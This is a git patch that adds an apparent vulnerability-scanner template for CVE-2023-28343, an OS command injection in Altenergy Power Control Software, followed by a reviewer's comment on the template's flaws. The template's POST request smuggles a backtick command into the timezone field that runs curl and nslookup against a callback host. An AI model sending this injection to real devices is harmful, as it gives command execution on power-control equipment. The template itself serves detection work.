From 9ec0d967c8f5e0129ee5c1312512ac4c211fbd2d Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Wed, 22 Mar 2023 23:32:10 +0700
Subject: [PATCH] Create CVE-2023-28343
---
cves/2023/CVE-2023-28343 | 35 +++++++++++++++++++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 cves/2023/CVE-2023-28343
diff --git a/cves/2023/CVE-2023-28343 b/cves/2023/CVE-2023-28343
new file mode 100644
index 0000000000..33003c9895
--- /dev/null
+++ b/cves/2023/CVE-2023-28343
@@ -0,0 +1,35 @@
+id: CVE-2023-28343
+
+info:
+ name: Altenergy Power Control Software Command-Injection
+ author: pikpikcu
+ severity: critical
+ description: |
+ OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28343
+ - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-28343
+ cwe-id: CWE-78
+ tags: cve,cve2023,rce,altenergy
+
+requests:
+ - raw:
+ - |
+ POST /index.php/management/set_timezone HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+ Accept-Encoding: gzip, deflate
+ Referer: {{Hostname}}/index.php/management/datetime
+ timezone=`curl {{interactsh-url}} | nslookup {{interactsh-url}}`
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+ - "http"
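Review bot: The raw request has no empty line between the `Referer:` header and `timezone=...` (the hunk's 35 added lines leave no room for one), so the form body is likely parsed as a malformed header and the POST goes out without the parameter, which makes the check a silent false negative on vulnerable hosts; an empty line before `timezone=` fixes it. The file is created as `cves/2023/CVE-2023-28343` without a `.yaml` extension, so the template loader will probably skip it. `Referer: {{Hostname}}/index.php/management/datetime` has no scheme; `Referer: {{RootURL}}/index.php/management/datetime` gives a well-formed value. The matcher comment says DNS only while the word list also accepts `http`; `# Confirms a DNS or HTTP interaction` describes it, and because the request writes the device's timezone setting the template should carry the `intrusive` tag so it can be excluded from scans of production equipment.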